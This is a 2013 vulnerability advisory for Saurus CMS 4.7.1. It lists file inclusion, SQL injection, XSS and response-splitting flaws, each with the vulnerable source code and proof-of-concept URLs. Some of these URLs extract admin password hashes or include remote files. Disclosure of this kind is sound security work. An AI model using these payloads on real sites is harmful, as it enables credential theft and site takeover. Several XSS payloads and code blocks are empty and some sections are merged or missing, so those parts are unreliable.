[waraxe-2013-SA#106] - Multiple Vulnerabilities in Saurus CMS 4.7.1 ================================================================================ Author: Janek Vind "waraxe" Date: 14. July 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-106.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Web publishing system combining daily content management features with site administration and development tools. http://www.saurus.info/ Vulnerable was version 4.7.1 before 07. June 2013, older versions not tested: http://www.saurus.info/version-history/ ############################################################################### 1. Local File Inclusion in "admin/fckeditor_dialog_image.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "dialog" Preconditions: 1. Logged in as Saurus CMS user 2. At least one valid file ID must be known (can be bruteforced) Php script "admin/fckeditor_dialog_image.php" line 101: ------------------------[ source code start ]---------------------------------- $object = new Objekt(array( 'objekt_id' => (int)$site->fdat['file_id'], 'on_sisu' => 1, )); .. include_once('../js/fckeditor/editor/'.$site->fdat['dialog']); ------------------------[ source code end ]------------------------------------ Test (parameter "file_id" must be valid): http://localhost/saurus471/admin/fckeditor_dialog_image.php?file_id=10572&dialog=../../../.htaccess Result: contents of ".htaccess" file from Saurus CMS root directory will be revealed, LFI confirmed. ############################################################################### 2. Local File Inclusion in "extensions/saurus4/captcha_image.php" ############################################################################### Reason: 1. uninitialized variable "$captcha" Attack vector: 1. user-supplied parameter "captcha" Preconditions: 1. PHP setting "register_globals = on" Php script "extensions/saurus4/captcha_image.php" line 45: ------------------------[ source code start ]---------------------------------- switch ($captcha['image_type']) { case 'gif': include_once($class_path.'lgpl/GotchaGIF.class.php'); $img = new GotchaGIF($captcha['image_width'], $captcha['image_height']); break; .. if($img->create()) { //apply effects foreach($captcha['effects'] as $effect) { $effect_name = $effect['name']; //echo $effect_name; include_once($class_path.'lgpl/'.$effect_name.'.class.php'); ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/extensions/saurus4/captcha_image.php? captcha[image_type]=gif&captcha[image_width]=50&captcha[image_height]=50& captcha[effects][0][name]=../waraxe Result: Warning: include_once(../../classes/lgpl/../waraxe.class.php) [function.include-once]: failed to open stream: No such file or directory in C:\apache_www\saurus471\extensions\saurus4\captcha_image.php on line 73 PHP error message above confirms LFI vulnerability. ############################################################################### 3. Local File Inclusion in "admin/edit.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "extension_path" Preconditions: 1. Logged in as Saurus CMS user Php script "admin/edit.php" line 76: ------------------------[ source code start ]---------------------------------- if($site->fdat['extension_path']) { $actions_file = '..'.$site->fdat['extension_path'].'/actions.inc.php'; .. if (file_exists($actions_file)){ include_once($actions_file); ------------------------[ source code end ]------------------------------------ ############################################################################### 4. Remote File Inclusion in "map.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied GET parameter "cmd" Preconditions: 1. Windows server Php script "map.php" line 56: ------------------------[ source code start ]---------------------------------- $tmp_cmd=explode("/",$_GET['cmd']); .. foreach($tmp_cmd as $t){ // if the there is a .php in the URL then don't use aliases go directly to that file if(preg_match('/\.php$/i', $t) && file_exists($t) && !preg_match("#^\.\./#", $t)) .. include($t); ------------------------[ source code end ]------------------------------------ On *nix servers this code above is secure enough, but things change in case of Windows server - attacker is able to use backslashes, which leads to RFI. Example attack using local file: http://localhost/saurus471/map.php?cmd=..\..\..\..\test.php Example attack using remote file: http://localhost/saurus471/map.php?cmd=\\192.168.1.25\test.php ############################################################################### 5. Remote File Inclusion in "admin/change_config.php" ############################################################################### Reason: 1. uninitialized variable "$class_path" Attack vector: 1. user-supplied parameter "class_path" Preconditions: 1. PHP setting "register_globals = on" Php script "admin/change_config.php" line 25: ------------------------[ source code start ]---------------------------------- global $class_path; .. if(!isset($class_path)) { $class_path = "../classes/"; } .. include_once($class_path."port.inc.php"); ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/change_config.php?class_path=http://php.net/? ############################################################################### 6. Remote File Inclusion in "admin/repair_database.php" ############################################################################### Reason: 1. uninitialized variable "$class_path" Attack vector: 1. user-supplied parameter "class_path" Preconditions: 1. PHP setting "register_globals = on" Php script "admin/repair_database.php" line 23: ------------------------[ source code start ]---------------------------------- global $class_path; if(!isset($class_path)) { $class_path = "../classes/"; } include_once($class_path."port.inc.php"); ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/repair_database.php?class_path=http://php.net/? ############################################################################### 7. Remote File Inclusion in "admin/check_adminpage.php" ############################################################################### Reason: 1. uninitialized variable "$class_path" Attack vector: 1. user-supplied parameter "class_path" Preconditions: 1. PHP setting "register_globals = on" Php script "admin/check_adminpage.php" line 29: ------------------------[ source code start ]---------------------------------- if(!isset($class_path)) { $class_path = "../classes/"; } include($class_path."port.inc.php"); ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/check_adminpage.php?class_path=http://php.net/? ############################################################################### 8. SQL Injection in "index.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied GET parameter "pg" Preconditions: 1. PHP setting "magic_quotes_gpc = Off" Php script "index.php" line 303: ------------------------[ source code start ]---------------------------------- if ($CMS_SETTINGS['switch_lang_enabled'] && !$cache_data && !$_GET['lang'] && !$_GET['keel'] && (is_numeric($_GET['id']) || is_numeric($_GET['pg']))){ $myid = $_GET['id'] ? $_GET['id'] : $_GET['pg']; $sql = "SELECT keel.extension FROM objekt LEFT JOIN keel ON keel.keel_id=objekt.keel WHERE objekt_id='".$myid."'"; $sth = new SQL($sql); $mykeel = $sth->fetchsingle(); ------------------------[ source code end ]------------------------------------ As seen above, user-submitted GET parameters "id" and "pg" are checked to be numeric before using them in SQL query. If we analyze source code more closely, then it appears to be not as secure as planned by programmer. Attacker can input GET parameter "id" with value of "0" and GET parameter "pg" with SQL injection string containing single quote. As parameter "id" is numeric, checking code will be bypassed. Next line of code tests parameter "id" and because it is zero, variable "$myid" will get value from parameter "pg". This leads to SQL Injection. Test 1: http://localhost/saurus471/?speed_debug=on&id=0&pg=123 Result: "Page was generated in 1.20000 seconds.", normal server response. Test 2: http://localhost/saurus471/?speed_debug=on&id=0&pg='+UNION+SELECT+SLEEP(5)%23 Result: "Page was generated in 6.17751 seconds.", delay observed, SQL Injection confirmed. ############################################################################### 9. SQL Injection in "classes/sapi/function.init_search_results.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "sites" Preconditions: none Php script "classes/sapi/function.init_search_results.php" line 27: ------------------------[ source code start ]---------------------------------- function smarty_function_init_search_results($params,&$smarty) { .. if(!isset($sites)) $sites = $site->fdat['sites']; .. $pre_search_explode=explode(",",strtolower(trim($sites))); foreach($pre_search_explode as $k=>$v){ $pre_search_explode[$k]=trim($v); } $sql_keel = "SELECT keel_id FROM keel WHERE on_kasutusel=1 AND extension IN ('".implode("','",$pre_search_explode)."')"; .. $sth = new SQL($sql_keel); while($r = $sth->fetch("ASSOC")){ $keeled[]=$r['keel_id']; ------------------------[ source code end ]------------------------------------ As seen above, user-submitted parameter "sites" ends up used in SQL query without proper sanitization, which leads to SQL Injection vulnerability. Test 1: http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=waraxe Result: "Page was generated in 1.18560 seconds.", normal server response. Test 2: http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=')UNION+SELECT+SLEEP(5)%23 Result: "Page was generated in 6.22651 seconds.", delay observed, SQL Injection confirmed. ############################################################################### 10. SQL Injection in "admin/error_log.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameters "algus", "lopp", "err_type", "sortby" and "sort" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/error_log.php" line 63: ------------------------[ source code start ]---------------------------------- $algus_aeg = $site->fdat['algus']? $site->fdat['algus'] : date("d.m.Y",$start_d); $lopp_aeg = $site->fdat['lopp']? $site->fdat['lopp'] : date("d.m.Y"); .. if ($algus_aeg) { $where_sql[] = " error_log.time_of_error>='".$site->db->ee_MySQL($algus_aeg)." 00:00' "; } if ($lopp_aeg) { $where_sql[] = " error_log.time_of_error<='".$site->db->ee_MySQL($lopp_aeg)." 23:59' "; } if ($site->fdat['err_type']) { $where_sql[] = " error_log.err_type = '".$site->fdat['err_type']."' "; } .. $where_str = sizeof($where_sql)>0 ? " WHERE ".join(" AND ",$where_sql) : ''; .. $site->fdat['sortby'] = $site->fdat['sortby'] ? $site->fdat['sortby'] : 'time_of_error'; $site->fdat['sort'] = $site->fdat['sort'] ? $site->fdat['sort'] : 'DESC'; .. if($site->fdat['sortby']){ $order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort']; } .. $sql = $site->db->prepare("SELECT DATE_FORMAT(time_of_error,'%d.%m.%y %T') AS time_of_errorf, error_log.*"); $sql .= $from_sql; $sql .= $where_str; $sql .= $order; $sql .= $pagenumbers['limit_sql']; .. $sth = new SQL($sql); .. while ( $log = $sth->fetch() ) { ------------------------[ source code end ]------------------------------------ Test 1: http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23 http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23 http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23 Result: MySQL version info will be revealed Test 2: http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23 http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23 http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23 Result: Username and password hash of the Saurus CMS user with ID 1 will be revealed ############################################################################### 11. SQL Injection in "admin/extensions.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameters "sortby" and "sort" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/extensions.php" line 297: ------------------------[ source code start ]---------------------------------- $site->fdat['sortby'] = $site->fdat['sortby'] ? $site->fdat['sortby'] : 'name'; $site->fdat['sort'] = $site->fdat['sort'] ? $site->fdat['sort'] : 'ASC'; .. if($site->fdat['sortby']){ $order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort']; } .. $sql = $site->db->prepare("SELECT DATE_FORMAT(version_date,'%d.%m.%Y') AS fversion_date, extensions.*"); $sql .= $from_sql; $sql .= $order; .. $sth = new SQL($sql); .. while ( $ext = $sth->fetch() ) { ------------------------[ source code end ]------------------------------------ Test 1: http://localhost/saurus471/admin/extensions.php?sortby=1 Result: normal server response, no additional delay. Test 2: http://localhost/saurus471/admin/extensions.php?sortby=SLEEP(5)%23 Result: additionial delay observed, SQL Injection confirmed. ############################################################################### 12. SQL Injection in "admin/profile_data.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameters "sortby" and "sort" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/profile_data.php" line 521: ------------------------[ source code start ]---------------------------------- if($site->fdat['sortby']){ $order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort']; } .. $sql .= $from_sql; $sql .= $where; $sql .= $order; $sql .= $pagenumbers['limit_sql']; $sth = new SQL($sql); .. if($sth->rows){ .. while($asset = $sth->fetch()){ ------------------------[ source code end ]------------------------------------ ############################################################################### 13. SQL Injection in "classes/user_html.inc.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameters "sortby" and "sort" Preconditions: 1. logged in as Saurus CMS admin Php script "classes/user_html.inc.php" line 313: ------------------------[ source code start ]---------------------------------- $order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort']; .. $sql = $site->db->prepare("SELECT users.* FROM users "); $sql .= $join; $sql .= $where; $sql .= $order; $sql .= $pagenumbers['limit_sql']; .. $sth = new SQL($sql); .. while($tmp = $sth->fetch()){ ------------------------[ source code end ]------------------------------------ ############################################################################### 14. SQL Injection in "admin/sys_sonad_loetelu.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "sst_id" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/sys_sonad_loetelu.php" line 123: ------------------------[ source code start ]---------------------------------- $sst_id = ($site->fdat['sst_id'] ? $site->fdat['sst_id'] : $glossary_word_types[0]['sst_id']); if(is_numeric($site->fdat['flt_keel'])) { .. $otsi = $otsi ? " (sys_sonad_kirjeldus.sona LIKE '%".$otsi."%' OR sys_sonad.sona LIKE '%".$otsi."%' OR sys_sonad.origin_sona LIKE '%".$otsi."%' OR sys_sonad.sys_sona LIKE '%".$otsi."%' OR sys_sonad_kirjeldus.sys_sona LIKE '%".$otsi."%') " : " sys_sonad.sst_id=".$sst_id; $where_str = $site->db->prepare(" WHERE sys_sonad.keel=? AND ".$otsi." ", $keel_id, 1 ); .. $sql .= $where_str; .. $sth = new SQL($sql); .. while ( $mysona = $sth->fetch('ASSOC') ) { $words[] = $mysona; } ------------------------[ source code end ]------------------------------------ Test 1: http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+@@version,1,1,1,1,1,1,1%23 Result: MySQL version info will be revealed Test 2: http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+CONCAT_WS(0x3a,username,password),1,1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23 Result: Username and password hash of the Saurus CMS user with ID 1 will be revealed ############################################################################### 15. SQL Injection in "admin/change_config.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "timezone" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/change_config.php" line 153: ------------------------[ source code start ]---------------------------------- $q="update config set sisu='".$site->fdat['timezone']."' where nimi='time_zone'"; new SQL($q); ------------------------[ source code end ]------------------------------------ ############################################################################### 16. Stored XSS in "admin/log.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "user" Preconditions: 1. 1. "Enable site log" enabled (it is by default) Php script "classes/site.class.php" line 538: ------------------------[ source code start ]---------------------------------- if($this->fdat["op"] == 'login' && $this->fdat["url"] && $this->CONF['disable_form_based_login'] != "1") { $this->user = new User(array( user => $this->fdat["user"], pass => $this->fdat["pass"], "site" => &$this, )); $user_id = $this->user->user_id; if ($user_id) { .. else { # kirjuta logi new Log(array( 'action' => 'log in', 'component' => 'Users', 'type' => 'NOTICE', 'message' => "Unauthorized access to CMS: username '".$this->fdat["user"]."', IP: '".$_SERVER["REMOTE_ADDR"]."'", )); ------------------------[ source code end ]------------------------------------ As seen above, in case of failed login attempt site log entry will be created, containing various information, including submitted username. Php script "admin/log.php" line 265: ------------------------[ source code start ]---------------------------------- .. ------------------------[ source code end ]------------------------------------ We can see, that php script "admin/log.php", used by admins for sitelog view, does not implement proper encoding or escaping of output, leading to Stored XSS vulenrability. Because this specific XSS payload can be inserted by anonymous user, but target victim is admin, then it has serious security impact and can lead to site full compromise. Possible attack scenario: 1. Stored XSS insertion, 2. admin opens log.php, XSS payload steals CSRF token, 3. CSRF attack, new admin account creation, 4. attacker logs in as new admin, game over ... Test: 1. Issue GET request as below: http://localhost/saurus471/admin/?op=login&url=1&user= 2. Log in as Saurus CMS admin and open site log page: http://localhost/saurus471/admin/log.php Result: javascript alert box pops up, confirming Stored XSS vulnerability. ############################################################################### 17. Stored XSS in "admin/error_log.php" ############################################################################### Reason: 1. improper encoding or escaping of output Preconditions: 1. "Save PHP and MySQL errors into the database" enabled (it is by default) Php script "classes/port.inc.php" line 150: ------------------------[ source code start ]---------------------------------- function saurusErrorHandler($errno, $errmsg, $filename, $linenum, $vars){ .. if (!defined("SAVE_ERROR_LOG")){ $res = @mysql_query("SELECT sisu FROM config WHERE nimi='save_error_log'"); if ($res){ list($tmp) = @mysql_fetch_array($res); } define("SAVE_ERROR_LOG", ($tmp ? 1:0)); } if (SAVE_ERROR_LOG && !substr_count($errmsg, 'mysql_num_fields')){ @mysql_query("INSERT INTO error_log (time_of_error, source, err_text, err_type, domain, referrer, fdat_scope, ip, remote_user) VALUES (NOW(), '".addslashes($filename." line ".$linenum)."', '".addslashes($errmsg)."', 'PHP', '".addslashes($_SERVER['HTTP_HOST'])."', '".addslashes($_SERVER['REQUEST_URI'])."', '".addslashes($serialized_fdat). "', '".$_SERVER['REMOTE_ADDR']."', '".addslashes($_SERVER['REMOTE_USER'])."')"); } } } # Redefine error handler $old_error_handler = set_error_handler("saurusErrorHandler"); ------------------------[ source code end ]------------------------------------ As seen above, new PHP error handler is defined, which writes all PHP error messages to error log in database. Php script "admin/error_log.php" line 320: ------------------------[ source code start ]---------------------------------- ------------------------[ source code end ]------------------------------------ We can see, that php script "admin/log.php", used by admins for error log view, does not implement proper encoding or escaping of output, leading to Stored XSS vulenrability. Because this specific XSS payload can be inserted by anonymous user, but target victim is admin, then it has serious security impact and can lead to site full compromise by similar scenario as described in previous case. Test: 1. Issue GET request as below (MySQL Injection from one of the previous cases): http://localhost/saurus471/?id=0&pg=' 2. Log in as Saurus CMS admin and open erro log page: http://localhost/saurus471/admin/error_log.php Result: javascript alert box pops up, confirming Stored XSS vulnerability. ############################################################################### 18. XSS protection bypass in "classes/port.inc.php" ############################################################################### Php script "classes/port.inc.php" line 536: ------------------------[ source code start ]---------------------------------- if(strstr($_SERVER['REQUEST_URI'], $CMS_SETTINGS['wwwroot'].'/admin/') === false && ( detect_xss_in_saurus_params($_SERVER['QUERY_STRING']) || detect_xss_in_saurus_params($_SERVER['REQUEST_URI']) || detect_xss_in_string($_SERVER['PHP_SELF']) || detect_xss_in_saurus_params($_POST) || detect_xss_in_saurus_params($_GET)) ) { header('Location: '.$CMS_SETTINGS['wwwroot'].'/index.php'); exit; } ------------------------[ source code end ]------------------------------------ We can see, that XSS detection functions are used against various input parameters and in case of positive hit redirection to home page follows. There is custom exclusion in place for administrative scripts and it's implementation is not secure enough - attacker can use "$CMS_SETTINGS['wwwroot'].'/admin/'" string in URI and XSS detection will be bypassed. String for XSS detection bypass is "/saurus471/admin/" in examples below. Test 1: http://localhost/saurus471/kalender.php?month= http://localhost/saurus471/kalender.php?vorm= http://localhost/saurus471/kalender.php?form_field= http://localhost/saurus471/kalender.php?lahter= http://localhost/saurus471/kalender.php?/saurus471/admin/&month=1 Results: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities. ############################################################################### 20. Reflected XSS in "editor/kalender.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "form", "vorm", "form_field", "lahter" and "month" Preconditions: 1. must be logged in as user Php script "editor/kalender.php" line 50: ------------------------[ source code start ]---------------------------------- http://localhost/saurus471/editor/kalender.php?vorm= http://localhost/saurus471/editor/kalender.php?form_field= http://localhost/saurus471/editor/kalender.php?lahter= http://localhost/saurus471/editor/kalender.php?/saurus471/admin/&month=1 Results: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities. ############################################################################### 21. Reflected XSS in "admin/delete_log.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "tbl" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/delete_log.php" line 176: ------------------------[ source code start ]---------------------------------- ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/delete_log.php?tbl="> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 22. Reflected XSS in "admin/edit_adminpage.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "id" and "op" Preconditions: 1. logged in as Saurus CMS admin Tests: http://localhost/saurus471/admin/edit_adminpage.php?id="> http://localhost/saurus471/admin/edit_adminpage.php?op="> Results: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities. ############################################################################### 23. Reflected XSS in "admin/edit_group.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "group_id" Preconditions: 1. logged in as Saurus CMS admin Tests: http://localhost/saurus471/admin/edit_group.php?op=edit&group_id=1"> Result: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities. ############################################################################### 24. Reflected XSS in "admin/profile_data.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "profile_id" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/profile_data.php" line 65: ------------------------[ source code start ]---------------------------------- print "Profile '".$site->fdat['profile_id']."' not found!"; ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/profile_data.php?profile_id= Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 25. Reflected XSS in "admin/edit_object.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "profile_id" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/edit_object.php" line 101: ------------------------[ source code start ]---------------------------------- print "Profile '".$profile_id."' not found!"; ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/edit.php?tab=object&op=new&&tyyp_id=20&profile_id=, Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 26. Reflected XSS in "admin/edit_profile.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "pid" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/edit_profile.php" line 997: ------------------------[ source code start ]---------------------------------- print "Profile '".$site->fdat['pid']."' not found!"; ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/edit_profile.php?op=edit&did=1&pid= Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 27. Reflected XSS in "admin/profiles.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "profile_id", "source_table", "did" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/profiles.php" line 247: ------------------------[ source code start ]---------------------------------- fdat['profile_id']?> &did=fdat['did']?>' .. fdat['profile_id']){?>fdat['profile_id']?> &did=fdat['did']?>' .. http://localhost/saurus471/admin/profiles.php?profile_id=z&did="> Results: javascript alert boxes popping up, confirming Reflected XSS vulnerability. ############################################################################### 28. Reflected XSS in "admin/sys_alias.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "flt_keel" and "keel_id" Preconditions: 1. logged in as Saurus CMS admin Test: http://localhost/saurus471/admin/sys_alias.php?flt_keel="> http://localhost/saurus471/admin/sys_alias.php?keel_id="> Result: javascript alert boxes popping up, confirming Reflected XSS vulnerability. ############################################################################### 29. Reflected XSS in "admin/sys_sonad_loetelu.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "flt_keel" Preconditions: 1. logged in as Saurus CMS admin Test: http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel= Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 30. Reflected XSS in "admin/user_management.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. all user-supplied parameters (excluding "selected_devices") Preconditions: 1. logged in as Saurus CMS admin Php script "admin/user_management.php" line 138: ------------------------[ source code start ]---------------------------------- foreach($site->fdat as $fdat_field=>$fdat_value) { if($fdat_field != 'selected_devices'){ echo ''; } ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/user_management.php?foobar="> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 31. Reflected XSS in "admin/permissions.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "selected_group", "user_id", "group_id" and "role_id" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/permissions.php" line 229: ------------------------[ source code start ]---------------------------------- ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/permissions.php?selected_group="> http://localhost/saurus471/admin/permissions.php?user_id="> http://localhost/saurus471/admin/permissions.php?group_id="> http://localhost/saurus471/admin/permissions.php?role_id="> Result: javascript alert boxes popping up, confirming Reflected XSS vulnerability. ############################################################################### 32. Reflected XSS in "admin/file_source.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied GET parameter "selected_group" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/file_source.php" line 47: ------------------------[ source code start ]---------------------------------- $callback = (string)$_GET['callback']; .. (""); ------------------------[ source code end ]------------------------------------ Test (parameter "file" must be valid): http://localhost/saurus471/admin/file_source.php?file=public/test.php&callback=alert(123);// Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 33. Reflected XSS in "admin/change_config.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "flt_keel" and "group" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/change_config.php" line 1220: ------------------------[ source code start ]---------------------------------- .. ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/change_config.php?group=1&flt_keel="> http://localhost/saurus471/admin/change_config.php?group="> Result: javascript alert boxes popping up, confirming Reflected XSS vulnerability. ############################################################################### 34. Reflected XSS in "admin/forms.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "form_id" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/forms.php" line 222: ------------------------[ source code start ]---------------------------------- if($site->fdat['op'] == 'delete' && $site->fdat['form_id']) { .. ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/forms.php?op=delete&form_id="> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 35. Reflected XSS in "admin/lang_file.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "flt_keel" and "keel_id" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/lang_file.php" line 204: ------------------------[ source code start ]---------------------------------- $keel_id = isset($site->fdat[flt_keel]) ? $site->fdat[flt_keel] : $site->fdat[keel_id]; .. ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/lang_file.php?op=import&flt_keel="> http://localhost/saurus471/admin/lang_file.php?op=import&keel_id="> Result: javascript alert boxes popping up, confirming Reflected XSS vulnerability. ############################################################################### 36. Reflected XSS in "admin/select_group.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. all user-supplied parameters (excluding "selected_devices") Preconditions: 1. logged in as Saurus CMS admin Php script "admin/select_group.php" line 442: ------------------------[ source code start ]---------------------------------- foreach($site->fdat as $fdat_field=>$fdat_value) { if($fdat_field != 'selected_devices'){ echo ' ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/select_group.php?foobar="> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 37. HTTP Response Splitting and insecure redirection in "redirect.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied GET parameter "url" Preconditions: 1. php version < 4.4.2 or < 5.1.2 Php script "redirect.php" line 100: ------------------------[ source code start ]---------------------------------- if($_GET['url']) { $url = urldecode($_GET['url']); //prevent Response Splitting attack $url = preg_replace("!\r|\n.*!s", "", $url); header('Location: '.$_GET['url']); ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/redirect.php?url=war%0d%0axe Result (using php 5.3.24): Warning: Header may not contain more than a single header, new line detected in C:\apache_www\saurus471\redirect.php on line 106 Test: http://localhost/saurus471/redirect.php?url=http://php.net/ Result: successful redirection ############################################################################### 38. HTTP Response Splitting and insecure redirection in "editor/redirect.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied GET parameter "url" Preconditions: 1. php version < 4.4.2 or < 5.1.2 Php script "editor/redirect.php" line 100: ------------------------[ source code start ]---------------------------------- if($_GET['url']) { $url = urldecode($_GET['url']); //prevent Response Splitting attack $url = preg_replace("!\r|\n.*!s", "", $url); header('Location: '.$_GET['url']); ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/editor/redirect.php?url=war%0d%0axe Result (using php 5.3.24): Warning: Header may not contain more than a single header, new line detected in C:\apache_www\saurus471\editor\redirect.php on line 106 Test: http://localhost/saurus471/editor/redirect.php?url=http://php.net/ Result: successful redirection ############################################################################### 39. HTTP Response Splitting in "idcard/index.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied GET and POST parameters "targeturl" Preconditions: 1. HTTPS connection needed ("SSLRequireSSL" directive in ".htaccess" file) 2. php version < 4.4.2 or < 5.1.2 Php script "idcard/index.php" line 9: ------------------------[ source code start ]---------------------------------- if($_GET['targeturl']) { $targeturl = '?target_url='.$_GET['targeturl']; } elseif($_POST['targeturl']) { $targeturl = '?target_url='.$_POST['targeturl']; } header('Location: ../idcard.php'.$targeturl); ------------------------[ source code end ]------------------------------------ ############################################################################### 40. HTTP Response Splitting in "admin/lang_file.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameters "flt_keel" and "keel_id" Preconditions: 1. php version < 4.4.2 or < 5.1.2 2. logged in as Saurus CMS admin Php script "admin/lang_file.php" line 44: ------------------------[ source code start ]---------------------------------- $keel_id = isset($site->fdat[flt_keel]) ? $site->fdat[flt_keel] : $site->fdat[keel_id]; .. if ($site->fdat['op'] == 'export' && $site->fdat['op2'] == 'salvesta'){ header("Content-Disposition: attachment; filename=\"language".$keel_id.".csv\""); ------------------------[ source code end ]------------------------------------ 